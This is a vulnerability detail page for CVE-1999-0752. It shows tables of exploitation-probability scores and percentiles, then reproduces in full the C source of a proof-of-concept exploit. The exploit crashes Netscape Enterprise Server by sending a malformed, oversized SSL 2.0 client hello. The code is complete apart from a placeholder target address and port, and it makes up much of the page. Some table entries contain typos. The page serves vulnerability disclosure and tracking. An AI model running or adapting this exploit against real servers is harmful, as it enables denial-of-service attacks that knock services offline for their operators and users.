CVE-1999-0752 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	4.19%	–	–
2022-04-03	–	–	4.19%	–	–
2022-07-17	–	–	4.19%	–	–
2023-03-12	–	–	–	0.26%	–
2023-08-06	–	–	–	0.26%	–
2024-02-11	–	–	–	0.29%	–
2024-04-14	–	–	–	0.29%	–
2024-06-02	–	–	–	0.29%	–
2024-11-17	–	–	–	0.29%	–
2024-12-22	–	–	–	0.29%	–
2024-12-29	–	–	–	0.29%	–
2025-01-19	–	–	–	0.29%	–
2025-03-18	–	–	–	–	3.75%
2025-03-18	–	–	–	–	3.75,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	7%
2022-04-03	86%
2022-07-17	87%
2023-03-12	62%
2023-08-06	63%
2024-02-11	68%
2024-04-14	69%
2024-06-02	69%
2024-11-17	7%
2024-12-22	68%
2024-12-29	69%
2025-01-19	69%
2025-03-18	87%
2025-03-18	87%

/* source: https://www.securityfocus.com/bid/516/info Netscape's Enterprise Server suffers from a buffer overflow error in the SSL handshaking code that causes it to crash when the buffer is overrun. */ // // nesexploit.c - v1.02 - by Arne Vidstrom, winnt@bahnhof.se // // This program crashes Netscape Enterprise Server when it is // running in SSL mode, by exploiting a bug in the SSL handshake // code. The server crashes if the client: // // * starts with SSL 2.0 format // * uses long record header // * uses padding >= 8 // * sends at least 11 bytes more data than it specifies in the // header // * sends at least about 4 kb data // // I haven't included any error handling in the code because it's // so boring to write... ;o) // #include <winsock.h> #include <string.h> #include <stdio.h> #define sockaddr_in struct sockaddr_in #define sockaddr struct sockaddr // Some combinations of these three constants will crash the server, // others will not. #define PADDING 8 #define SPECIFIED_SIZE 11822 #define ACTUAL_SIZE 11833 void main(void) { // IP address of the server - set to your own server and nobody // elses :o) char ipaddr[25] = "xxx.xxx.xxx.xxx"; // SSL port unsigned short port = xxxxx; SOCKET socket1; unsigned char s[65536]; int errorCode; WSADATA winSockData; sockaddr_in peer; int result; unsigned char i; unsigned int l; int flags; printf("\nnesexploit.c - developed by Arne Vidstrom, winnt@bahnhof.se\n\n"); // Allocate a socket, connect and stuff... errorCode = WSAStartup(0x0101, &winSockData); socket1 = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); peer.sin_family = AF_INET; peer.sin_port = htons(port); peer.sin_addr.s_addr = inet_addr(ipaddr); for (i = 0; i < 8; i++) peer.sin_zero[i] = 0; result = connect(socket1, (sockaddr *) &peer, sizeof(peer)); if (result != 0) printf("Ehmn, where's that server? ;o)\n\n"); // Initialize the buffer with a lot of '.' Anything would do... for (l=0; l<65536; l++) s[l] = '.'; // Version 2.0 Format Header with padding. // Shouldn't be any padding because this part is not encrypted, // but without padding the server won't crash. :o) s[0] = (SPECIFIED_SIZE & 0xff00) >> 8; s[1] = (SPECIFIED_SIZE & 0x00ff); s[2] = PADDING; // Client says Hello! s[3] = 0x01; // Client wishes to use Version 3.0 later (there will be no "later" though...) s[4] = 0x03; s[5] = 0x00; // Cipher Specs Length = 3 s[6] = 0x00; s[7] = 0x0c; // Session ID = 0 s[8] = 0x00; s[9] = 0x00; // Challenge Length = 16 s[10] = 0x00; s[11] = 0x10; // Challenge Specs Data s[12] = 0x02; s[13] = 0x00; s[14] = 0x80; s[15] = 0x04; s[16] = 0x00; s[17] = 0x80; s[18] = 0x00; s[19] = 0x00; s[20] = 0x03; s[21] = 0x00; s[22] = 0x00; s[23] = 0x06; // Challenge Data is a few '.' from above // The rest is also '.' from above // Send all this to the server flags = 0; result = send(socket1, s, ACTUAL_SIZE, flags); if (result != SOCKET_ERROR) printf("Done!\n\n"); // Clean up closesocket(socket1); WSACleanup(); }